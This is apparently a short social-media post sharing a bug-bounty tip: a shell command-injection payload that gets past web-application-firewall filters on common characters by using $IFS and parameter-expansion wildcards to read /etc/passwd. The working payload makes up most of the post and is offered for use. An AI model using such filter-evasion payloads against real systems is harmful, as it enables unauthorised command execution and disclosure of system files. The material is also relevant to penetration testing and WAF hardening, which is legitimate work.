Filter bypass with regex for OS injection commonly (/”‘&|()-;:.,`) block by WAF
shout out to @0dayCTF for find this:
E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
#infosecurity #cybersecurity #bugbountytips https://t.co/o8EFaYl8En